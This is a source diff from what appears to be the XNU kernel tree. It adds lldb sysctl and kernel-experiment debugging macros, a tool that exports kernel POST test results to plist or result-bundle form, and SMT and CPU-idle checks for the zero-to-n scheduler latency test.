+ prefix_len = min(len(prefix), len(next_parent)) + if next_parent[:prefix_len] == prefix[:prefix_len]: + for x in IterateSysctls(Cast(pp.oid_arg1, "struct sysctl_oid_list *"), prefix, depth + 1, next_parent): + yield x @lldb_command('showsysctls', 'P:') def ShowSysctls(cmd_args=[], cmd_options={}): @@ -1186,28 +1214,63 @@ def ShowSysctls(cmd_args=[], cmd_options={}): else: _ShowSysctl_prefix = '' allowed_prefixes = [] - def IterateSysctls(oid, parent_str, i): - headp = oid - parentstr = "" if parent_str is None else parent_str - for pp in IterateListEntry(headp, 'struct sysctl_oid *', 'oid_link', 's'): - type = pp.oid_kind & 0xf - next_parent = str(pp.oid_name) - if parent_str is not None: - next_parent = parent_str + "." + next_parent - st = (" " * i) + str(pp.GetSBValue().Dereference()).replace("\n", "\n" + (" " * i)) - if type == 1 and pp.oid_arg1 != 0: - # Check allowed_prefixes to see if we can recurse from root to the allowed prefix. - # To recurse further, we need to check only the the next parent starts with the user-specified - # prefix - if next_parent not in allowed_prefixes and next_parent.startswith(_ShowSysctl_prefix) is False: - continue - print 'parent = "%s"' % parentstr, st[st.find("{"):] - IterateSysctls(Cast(pp.oid_arg1, "struct sysctl_oid_list *"), next_parent, i + 2) - elif _ShowSysctl_prefix == '' or next_parent.startswith(_ShowSysctl_prefix): - print ('parent = "%s"' % parentstr), st[st.find("{"):] - IterateSysctls(kern.globals.sysctl__children, None, 0) + for sysctl, depth, parentstr in IterateSysctls(kern.globals.sysctl__children, _ShowSysctl_prefix): + if parentstr == "": + parentstr = "" + headp = sysctl + st = (" " * depth * 2) + str(sysctl.GetSBValue().Dereference()).replace("\n", "\n" + (" " * depth * 2)) + print 'parent = "%s"' % parentstr, st[st.find("{"):] + +@lldb_command('showexperiments', 'F') +def ShowExperiments(cmd_args=[], cmd_options={}): + """ Shows any active kernel experiments being run on the device via trial. 
+ Arguments: + -F: Scan for changed experiment values even if no trial identifiers have been set. + """ + + treatment_id = str(kern.globals.trial_treatment_id) + experiment_id = str(kern.globals.trial_experiment_id) + deployment_id = kern.globals.trial_deployment_id._GetValueAsSigned() + if treatment_id == "" and experiment_id == "" and deployment_id == -1: + print("Device is not enrolled in any kernel experiments.") + if not '-F' in cmd_options: + return + else: + print("""Device is enrolled in a kernel experiment: + treatment_id: %s + experiment_id: %s + deployment_id: %d""" % (treatment_id, experiment_id, deployment_id)) + + print("Scanning sysctl tree for modified factors...") + + kExperimentFactorFlag = 0x00100000 + + formats = { + "IU": gettype("unsigned int *"), + "I": gettype("int *"), + "LU": gettype("unsigned long *"), + "L": gettype("long *"), + "QU": gettype("uint64_t *"), + "Q": gettype("int64_t *") + } + for sysctl, depth, parentstr in IterateSysctls(kern.globals.sysctl__children): + if sysctl.oid_kind & kExperimentFactorFlag: + spec = cast(sysctl.oid_arg1, "struct experiment_spec *") + # Skip if arg2 isn't set to 1 (indicates an experiment factor created without an experiment_spec). + if sysctl.oid_arg2 == 1: + if spec.modified == 1: + fmt = str(sysctl.oid_fmt) + ptr = spec.ptr + t = formats.get(fmt, None) + if t: + value = cast(ptr, t) + else: + # Unknown type + continue + name = str(parentstr) + "." 
+ str(sysctl.oid_name) + print("%s = %d (Default value is %d)" % (name, dereference(value), spec.original_value)) from memory import * from process import * @@ -1240,3 +1303,4 @@ from ulock import * from ntstat import * from zonetriage import * from sysreg import * +from counter import * diff --git a/tools/tests/Makefile b/tools/tests/Makefile index 2c929f93f..a385e3dbb 100644 --- a/tools/tests/Makefile +++ b/tools/tests/Makefile @@ -33,6 +33,7 @@ COMMON_TARGETS = unit_tests \ perf_index \ personas \ unixconf \ + kernpost_test_report \ KEXT_TARGETS = pgokext.kext diff --git a/tools/tests/kernpost_test_report/Makefile b/tools/tests/kernpost_test_report/Makefile new file mode 100644 index 000000000..0181a8747 --- /dev/null +++ b/tools/tests/kernpost_test_report/Makefile @@ -0,0 +1,18 @@ +include ../Makefile.common + +DSTROOT?=$(shell /bin/pwd) +SYMROOT?=$(shell /bin/pwd) +OBJROOT?=$(shell /bin/pwd) + +CC:=$(shell xcrun -sdk "$(SDKROOT)" -find cc) + +CFLAGS:=$(ARCH_FLAGS) -g -Wall -Os -isysroot $(SDKROOT) -I$(SDKROOT)/System/Library/Frameworks/System.framework/PrivateHeaders -lkdd -framework Foundation + +all: $(DSTROOT)/kernpost_test_report + +$(DSTROOT)/kernpost_test_report: kernpost_test_report.m + $(CC) -o $@ $^ $(subst -arch i386,,$(CFLAGS)) + +clean: + rm -f $(DSTROOT)/kernpost_test_report $(OBJROOT)/*.o + rm -rf $(SYMROOT)/*.dSYM diff --git a/tools/tests/kernpost_test_report/kernpost_test_report.m b/tools/tests/kernpost_test_report/kernpost_test_report.m new file mode 100644 index 000000000..76d81a0ba --- /dev/null +++ b/tools/tests/kernpost_test_report/kernpost_test_report.m @@ -0,0 +1,379 @@ +#import +#include +#import +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#define FREE_BUF(_buf) \ + do { \ + if (_buf) { \ + free(_buf); \ + _buf = NULL; \ + } \ + } while (0); + +#define ERR(_msg_format, ...) 
fprintf(stderr, "error: " _msg_format "\n", ##__VA_ARGS__) + +#define PERR(_msg) perror("error: " _msg) + +/* XNUPost KCData constants */ +NSString * const kXNUPostKCDataKeyTestConfig = @"xnupost_testconfig"; +NSString * const kXNUPostKCDataKeyOSVersion = @"osversion"; +NSString * const kXNUPostKCDataKeyBootargs = @"boot_args"; +NSString * const kXNUPostKCDataKeyMachTBInfo = @"mach_timebase_info"; +NSString * const kXNUPostKCDataKeyMachTBInfoDenom = @"denom"; +NSString * const kXNUPostKCDataKeyMachTBInfoNumer = @"numer"; +NSString * const kXNUPostKCDataKeySubTestConfig = @"xnupost_test_config"; +NSString * const kXNUPostKCDataKeyTestName = @"test_name"; +NSString * const kXNUPostKCDataKeyBeginTime = @"begin_time"; +NSString * const kXNUPostKCDataKeyEndTime = @"end_time"; +NSString * const kXNUPostKCDataKeyRetval = @"retval"; +NSString * const kXNUPostKCDataKeyExpectedRetval = @"expected_retval"; + +/* Resultbundle info constants */ +NSString * const kRBInfoKeyVersion = @"version"; +NSString * const kRBInfoKeyCategory = @"test_category"; +NSString * const kRBInfoKeyTestID = @"test_id"; +NSString * const kRBInfoKeyProject = @"Project"; +NSString * const kRBInfoKeyBootargs = @"boot-args"; +NSString * const kRBInfoKeyOSVersion = @"osVersion"; +NSString * const kRBInfoKeyResultCode = @"result_code"; +NSString * const kRBInfoKeyResultStarted = @"result_started"; +NSString * const kRBInfoKeyResultFinished = @"result_finished"; +NSString * const kRBInfoKeyMachTBInfo = @"mach_timebase_info"; +NSString * const kRBInfoKeyMachTBInfoDenom = @"denom"; +NSString * const kRBInfoKeyMachTBInfoNumer = @"numer"; +NSString * const kRBInfoKeyBeginTimeRaw = @"beginTimeRaw"; +NSString * const kRBInfoKeyEndTimeRaw = @"endTimeRaw"; + +NSNumber * const kResultBundleVersion = @2; +NSString * const kResultBundleCategory = @"unittest"; +NSString * const kResultBundleProject = @"xnu"; +NSNumber * const kResultCodePass = @200; +NSNumber * const kResultCodeFail = @400; + +#define COMMAND_EXPORT 
(0) +static int g_command = COMMAND_EXPORT; +#define OUTPUT_FORMAT_RAW (0) +#define OUTPUT_FORMAT_PLIST_XML (1) +#define OUTPUT_FORMAT_RESULTBUNDLE (2) +static int g_output_format = OUTPUT_FORMAT_RAW; +static char * g_output_dir = NULL; + +static void +usage(void) +{ + const char * progname = getprogname(); + fprintf(stderr, + "Usage:\t%s COMMAND [OPTIONS]\n\n" + "\t%s export -o OUTPUT_DIR_PATH [-f raw|plist|resultbundle]\n" + "\nSupported command:\n" + "\texport\n", + progname, progname); +} + +static void +parse_export_options(int argc, char * argv[]) +{ + int ch; + bool error = false; + + while ((ch = getopt(argc, argv, "o:f:")) != -1) { + switch (ch) { + case 'o': + g_output_dir = optarg; + break; + case 'f': + if (strncmp(optarg, "raw", 4) == 0) { + g_output_format = OUTPUT_FORMAT_RAW; + } else if (strncmp(optarg, "plist", 6) == 0) { + g_output_format = OUTPUT_FORMAT_PLIST_XML; + } else if (strncmp(optarg, "resultbundle", 13) == 0) { + g_output_format = OUTPUT_FORMAT_RESULTBUNDLE; + } else { + error = true; + } + break; + default: + error = true; + break; + } + } + + if (g_output_dir == NULL) { + error = true; + } + + struct stat path_stat; + if (stat(g_output_dir, &path_stat)) { + PERR("Failed to access output dir"); + error = true; + } else if (!S_ISDIR(path_stat.st_mode)) { + ERR("error: Output path must be a directory"); + error = true; + } + + if (error) { + usage(); + exit(EX_USAGE); + } +} + +static void +parse_options(int argc, char * argv[]) +{ + if (argc > 1) { + char * cmd = argv[1]; + argc--; + argv++; + if (strncmp(cmd, "export", 7) == 0) { + g_command = COMMAND_EXPORT; + parse_export_options(argc, argv); + } else { + usage(); + exit(EX_USAGE); + } + } else { + usage(); + exit(EX_USAGE); + } +} + +static void +retrieve_test_data(void ** raw_buf_p, size_t * raw_size_p) +{ + int rc = sysctlbyname("debug.xnupost_get_tests", NULL, raw_size_p, NULL, 0); + if (rc == 0 && *raw_size_p > 0) { + *raw_buf_p = malloc(*raw_size_p); + if (*raw_buf_p) { + rc = 
sysctlbyname("debug.xnupost_get_tests", *raw_buf_p, raw_size_p, NULL, 0); + if (0 != rc) { + PERR("Failed to get KCData through sysctl"); + } + } else { + PERR("Failed to allocate KCData raw buffer"); + } + } else { + PERR("Failed to get size through sysctl"); + } +} + +static void +export_raw(void * raw_buf, size_t raw_size) +{ + if (raw_buf) { + char output_path[MAXPATHLEN]; + snprintf(output_path, MAXPATHLEN, "%s/xnupost.kcdata", g_output_dir); + FILE * output_fp = fopen(output_path, "w"); + if (output_fp) { + fwrite(raw_buf, raw_size, 1, output_fp); + fclose(output_fp); + } else { + PERR("Failed to open output path"); + } + } +} + +static void +export_to_plist(void * raw_buf, size_t raw_size) +{ + if (raw_buf) { + char output_path[MAXPATHLEN]; + snprintf(output_path, MAXPATHLEN, "%s/xnupost.plist", g_output_dir); + NSError * nsError = nil; + NSDictionary * parsed_dict = parseKCDataBuffer(raw_buf, raw_size, &nsError); + if (parsed_dict) { + NSData * plist_data = [NSPropertyListSerialization dataWithPropertyList:parsed_dict + format:NSPropertyListXMLFormat_v1_0 + options:0 + error:&nsError]; + if (plist_data) { + if (![plist_data writeToFile:[NSString stringWithUTF8String:output_path] atomically:YES]) { + ERR("Failed to write plist to %s", output_path); + } + } else { + ERR("Failed to serialize result plist: %s", nsError.localizedDescription.UTF8String); + } + } else { + ERR("Failed to parse KCData to plist: %s", nsError.localizedDescription.UTF8String); + } + } +} + +#define RESULTBUNDLE_TIME_STR_SIZE (30) // 0000-00-00T00:00:00.000+00:00'\0' +#define RESULTBUNLDE_TIME_MS_INDEX (20) +#define RESULTBUNLDE_TIME_TZ_COLON_INDEX (26) +#define RESULTBUNDLE_TIME_MS_STR_SIZE (4) // 000'\0' +#define MSEC_PER_USEC 1000ull + +static void +get_estimated_time_str_resultbundle(char * output_str, uint64_t mach_abs_time_usec) +{ + uint64_t est_usec = mach_boottime_usec() + mach_abs_time_usec; + time_t est_sec = (time_t)(est_usec / USEC_PER_SEC); + uint64_t est_usec_fraction = 
est_usec % USEC_PER_SEC; + struct tm tm_info; + int i = 0; + + localtime_r(&est_sec, &tm_info); + strftime(output_str, RESULTBUNDLE_TIME_STR_SIZE, "%Y-%m-%dT%H:%M:%S.000%z", &tm_info); + + /* Fill out milliseconds */ + char ms_str[RESULTBUNDLE_TIME_MS_STR_SIZE] = {0}; + snprintf(ms_str, RESULTBUNDLE_TIME_MS_STR_SIZE, "%03llu", est_usec_fraction / MSEC_PER_USEC); + for (i = 0; i < 3; i++) { + output_str[RESULTBUNLDE_TIME_MS_INDEX + i] = ms_str[i]; + } + + /* Add colon for timezone offset */ + for (i = RESULTBUNDLE_TIME_STR_SIZE - 1; i > RESULTBUNLDE_TIME_TZ_COLON_INDEX; i--) { + output_str[i] = output_str[i - 1]; + } + output_str[RESULTBUNLDE_TIME_TZ_COLON_INDEX] = ':'; +} + +static void +create_subtest_bundle_config(NSDictionary * testconfig, NSDictionary * subtest, char * bundle_dir) +{ + NSString * testName = subtest[kXNUPostKCDataKeyTestName]; + NSNumber * tbInfoDenom = testconfig[kXNUPostKCDataKeyMachTBInfo][kXNUPostKCDataKeyMachTBInfoDenom]; + NSNumber * tbInfoNumer = testconfig[kXNUPostKCDataKeyMachTBInfo][kXNUPostKCDataKeyMachTBInfoNumer]; + struct mach_timebase_info tb_info; + tb_info.denom = tbInfoDenom.unsignedIntValue; + tb_info.numer = tbInfoNumer.unsignedIntValue; + NSNumber * beginTimeRaw = subtest[kXNUPostKCDataKeyBeginTime]; + NSNumber * endTimeRaw = subtest[kXNUPostKCDataKeyEndTime]; + uint64_t begin_time_usec = (beginTimeRaw.unsignedLongLongValue * tb_info.numer) / (tb_info.denom * NSEC_PER_USEC); + uint64_t end_time_usec = (endTimeRaw.unsignedLongLongValue * tb_info.numer) / (tb_info.denom * NSEC_PER_USEC); + bool test_status = + subtest[kXNUPostKCDataKeyRetval] && (subtest[kXNUPostKCDataKeyRetval] == subtest[kXNUPostKCDataKeyExpectedRetval]); + + char output_path[MAXPATHLEN]; + char * output_dir_end = NULL; + + snprintf(output_path, MAXPATHLEN, "%s/test_%s", bundle_dir, testName.UTF8String); + if (mkdir(output_path, 0777)) { + PERR("Failed to create subtest bundle dir"); + } + output_dir_end = output_path + strlen(output_path); + + 
*output_dir_end = '\0'; + strlcat(output_path, "/Attachments", MAXPATHLEN); + if (mkdir(output_path, 0777)) { + PERR("Failed to create subtest Attachments dir"); + } + + *output_dir_end = '\0'; + strlcat(output_path, "/Diagnostics", MAXPATHLEN); + if (mkdir(output_path, 0777)) { + PERR("Failed to create subtest Diagnostics dir"); + } + + NSMutableDictionary * rbInfo = [NSMutableDictionary new]; + rbInfo[kRBInfoKeyVersion] = kResultBundleVersion; + rbInfo[kRBInfoKeyCategory] = kResultBundleCategory; + rbInfo[kRBInfoKeyTestID] = testName; + rbInfo[kRBInfoKeyProject] = kResultBundleProject; + rbInfo[kRBInfoKeyOSVersion] = testconfig[kXNUPostKCDataKeyOSVersion]; + rbInfo[kRBInfoKeyBootargs] = testconfig[kXNUPostKCDataKeyBootargs]; + rbInfo[kRBInfoKeyResultCode] = test_status ? kResultCodePass : kResultCodeFail; + + char estimated_time_str[RESULTBUNDLE_TIME_STR_SIZE]; + get_estimated_time_str_resultbundle(estimated_time_str, begin_time_usec); + rbInfo[kRBInfoKeyResultStarted] = [NSString stringWithUTF8String:estimated_time_str]; + get_estimated_time_str_resultbundle(estimated_time_str, end_time_usec); + rbInfo[kRBInfoKeyResultFinished] = [NSString stringWithUTF8String:estimated_time_str]; + + rbInfo[kRBInfoKeyMachTBInfo] = @{kRBInfoKeyMachTBInfoDenom : tbInfoDenom, kRBInfoKeyMachTBInfoNumer : tbInfoNumer}; + + rbInfo[kRBInfoKeyBeginTimeRaw] = beginTimeRaw; + rbInfo[kRBInfoKeyEndTimeRaw] = endTimeRaw; + + *output_dir_end = '\0'; + strlcat(output_path, "/Info.plist", MAXPATHLEN); + NSURL * output_url = [NSURL fileURLWithFileSystemRepresentation:output_path isDirectory:NO relativeToURL:nil]; + NSError * writeError = nil; + if (![rbInfo writeToURL:output_url error:&writeError]) { + ERR("Failed to write Info.plist file: %s", writeError.localizedDescription.UTF8String); + } + + *output_dir_end = '\0'; + strlcat(output_path, test_status ? 
"/PASS.status" : "/FAIL.status", MAXPATHLEN); + int fd = open(output_path, O_CREAT | O_TRUNC | O_WRONLY, 0666); + if (fd == -1) { + PERR("Failed to create subtest status file"); + } else { + close(fd); + } +} + +static void +export_to_resultbundle(void * raw_buf, size_t raw_size) +{ + if (raw_buf) { + NSError * nsError = nil; + NSDictionary * parsed_dict = parseKCDataBuffer(raw_buf, raw_size, &nsError); + if (parsed_dict) { + NSDictionary * testconfig = parsed_dict[kXNUPostKCDataKeyTestConfig]; + NSArray * subtests = testconfig[kXNUPostKCDataKeySubTestConfig]; + + char bundle_dir[MAXPATHLEN]; + snprintf(bundle_dir, MAXPATHLEN, "%s/xnupost", g_output_dir); + if (mkdir(bundle_dir, 0777)) { + PERR("Failed to create result bundle dir"); + } + + for (NSDictionary * subtest in subtests) { + create_subtest_bundle_config(testconfig, subtest, bundle_dir); + } + } else { + ERR("Failed to parse KCData to plist: %s", nsError.localizedDescription.UTF8String); + } + } +} + +static void +execute_export(void) +{ + void * raw_buf = NULL; + size_t raw_size = 0; + retrieve_test_data(&raw_buf, &raw_size); + switch (g_output_format) { + case OUTPUT_FORMAT_PLIST_XML: + export_to_plist(raw_buf, raw_size); + break; + case OUTPUT_FORMAT_RESULTBUNDLE: + export_to_resultbundle(raw_buf, raw_size); + break; + case OUTPUT_FORMAT_RAW: + default: + export_raw(raw_buf, raw_size); + break; + } + + FREE_BUF(raw_buf); +} + +int +main(int argc, char * argv[]) +{ + parse_options(argc, argv); + switch (g_command) { + case COMMAND_EXPORT: + execute_export(); + break; + default: + usage(); + exit(EX_USAGE); + break; + } + + return 0; +} diff --git a/tools/tests/zero-to-n/zero-to-n.c b/tools/tests/zero-to-n/zero-to-n.c index e834ccdd0..f8cccbefa 100644 --- a/tools/tests/zero-to-n/zero-to-n.c +++ b/tools/tests/zero-to-n/zero-to-n.c @@ -38,6 +38,7 @@ #include #include #include +#include #include #include @@ -56,10 +57,11 @@ #include #include +#include #include typedef enum wake_type { WAKE_BROADCAST_ONESEM, 
WAKE_BROADCAST_PERTHREAD, WAKE_CHAIN, WAKE_HOP } wake_type_t; -typedef enum my_policy_type { MY_POLICY_REALTIME, MY_POLICY_TIMESHARE, MY_POLICY_FIXEDPRI } my_policy_type_t; +typedef enum my_policy_type { MY_POLICY_REALTIME, MY_POLICY_TIMESHARE, MY_POLICY_TIMESHARE_NO_SMT, MY_POLICY_FIXEDPRI } my_policy_type_t; #define mach_assert_zero(error) do { if ((error) != 0) { fprintf(stderr, "[FAIL] error %d (%s) ", (error), mach_error_string(error)); assert(error == 0); } } while (0) #define mach_assert_zero_t(tid, error) do { if ((error) != 0) { fprintf(stderr, "[FAIL] Thread %d error %d (%s) ", (tid), (error), mach_error_string(error)); assert(error == 0); } } while (0) @@ -229,7 +231,7 @@ static void create_churn_threads() { if (g_churn_count == 0) { - g_churn_count = g_numcpus - 1; + g_churn_count = g_test_rt_smt ? g_numcpus : g_numcpus - 1; } errno_t err; @@ -417,6 +419,8 @@ parse_thread_policy(const char *str) { if (strcmp(str, "timeshare") == 0) { return MY_POLICY_TIMESHARE; + } else if (strcmp(str, "timeshare_no_smt") == 0) { + return MY_POLICY_TIMESHARE_NO_SMT; } else if (strcmp(str, "realtime") == 0) { return MY_POLICY_REALTIME; } else if (strcmp(str, "fixed") == 0) { @@ -470,6 +474,9 @@ thread_setup(uint32_t my_id) switch (g_policy) { case MY_POLICY_TIMESHARE: break; + case MY_POLICY_TIMESHARE_NO_SMT: + proc_setthread_no_smt(); + break; case MY_POLICY_REALTIME: /* Hard-coded realtime parameters (similar to what Digi uses) */ pol.period = 100000; @@ -509,6 +516,20 @@ thread_setup(uint32_t my_id) return 0; } +time_value_t +get_thread_runtime(void) +{ + thread_basic_info_data_t info; + mach_msg_type_number_t info_count = THREAD_BASIC_INFO_COUNT; + thread_info(pthread_mach_thread_np(pthread_self()), THREAD_BASIC_INFO, (thread_info_t)&info, &info_count); + + time_value_add(&info.user_time, &info.system_time); + + return info.user_time; +} + +time_value_t worker_threads_total_runtime = {}; + /* * Wait for a wakeup, potentially wake up another of the "0-N" threads, * 
and notify the main thread when done. @@ -516,6 +537,8 @@ thread_setup(uint32_t my_id) static void* worker_thread(void *arg) { + static os_unfair_lock runtime_lock = OS_UNFAIR_LOCK_INIT; + uint32_t my_id = (uint32_t)(uintptr_t)arg; kern_return_t kr; @@ -736,6 +759,11 @@ worker_thread(void *arg) mach_assert_zero_t(my_id, kr); } + time_value_t runtime = get_thread_runtime(); + os_unfair_lock_lock(&runtime_lock); + time_value_add(&worker_threads_total_runtime, &runtime); + os_unfair_lock_unlock(&runtime_lock); + return 0; } @@ -774,6 +802,29 @@ compute_stats(uint64_t *values, uint64_t count, float *averagep, uint64_t *maxp, *stddevp = _dev; } +typedef struct { + natural_t sys; + natural_t user; + natural_t idle; +} cpu_time_t; + +void +record_cpu_time(cpu_time_t *cpu_time) +{ + host_cpu_load_info_data_t load; + mach_msg_type_number_t count = HOST_CPU_LOAD_INFO_COUNT; + kern_return_t kr = host_statistics(mach_host_self(), HOST_CPU_LOAD_INFO, (int *)&load, &count); + mach_assert_zero_t(0, kr); + + natural_t total_system_time = load.cpu_ticks[CPU_STATE_SYSTEM]; + natural_t total_user_time = load.cpu_ticks[CPU_STATE_USER] + load.cpu_ticks[CPU_STATE_NICE]; + natural_t total_idle_time = load.cpu_ticks[CPU_STATE_IDLE]; + + cpu_time->sys = total_system_time; + cpu_time->user = total_user_time; + cpu_time->idle = total_idle_time; +} + int main(int argc, char **argv) { @@ -787,6 +838,7 @@ main(int argc, char **argv) float avg, stddev; bool test_fail = false; + bool test_warn = false; for (int i = 0; i < argc; i++) { if (strcmp(argv[i], "--switched_apptype") == 0) { @@ -1026,6 +1078,11 @@ main(int argc, char **argv) usleep(g_iteration_sleeptime_us); } + cpu_time_t start_time; + cpu_time_t finish_time; + + record_cpu_time(&start_time); + /* Go! 
*/ for (uint32_t i = 0; i < g_iterations; i++) { uint32_t j; @@ -1100,6 +1157,8 @@ main(int argc, char **argv) } } + record_cpu_time(&finish_time); + /* Rejoin threads */ for (uint32_t i = 0; i < g_numthreads; i++) { ret = pthread_join(threads[i], NULL); @@ -1116,6 +1175,9 @@ main(int argc, char **argv) join_churn_threads(); } + uint32_t cpu_idle_time = (finish_time.idle - start_time.idle) * 10; + uint32_t worker_threads_runtime = worker_threads_total_runtime.seconds * 1000 + worker_threads_total_runtime.microseconds / 1000; + compute_stats(worst_latencies_ns, g_iterations, &avg, &max, &min, &stddev); printf("Results (from a stop):\n"); printf("Max:\t\t%.2f us\n", ((float)max) / 1000.0); @@ -1171,6 +1233,7 @@ main(int argc, char **argv) secondary ? " SECONDARY" : "", fail ? " FAIL" : ""); } + test_warn |= (secondary || fail); test_fail |= fail; fail_count += fail; } @@ -1181,6 +1244,17 @@ main(int argc, char **argv) } } + if (g_test_rt_smt && (g_each_spin_duration_ns >= 200000) && !test_warn) { + printf("cpu_idle_time=%dms worker_threads_runtime=%dms\n", cpu_idle_time, worker_threads_runtime); + if (cpu_idle_time < worker_threads_runtime / 4) { + printf("FAIL cpu_idle_time unexpectedly small\n"); + test_fail = 1; + } else if (cpu_idle_time > worker_threads_runtime * 2) { + printf("FAIL cpu_idle_time unexpectedly large\n"); + test_fail = 1; + } + } + free(threads); free(g_thread_endtimes_abs); free(worst_latencies_ns); @@ -1247,7 +1321,7 @@ static void __attribute__((noreturn)) usage() { errx(EX_USAGE, "Usage: %s " - " \n\t\t" + " \n\t\t" "[--trace ] " "[--verbose] [--spin-one] [--spin-all] [--spin-time ] [--affinity]\n\t\t" "[--no-sleep] [--drop-priority] [--churn-pri ] [--churn-count ]\n\t\t"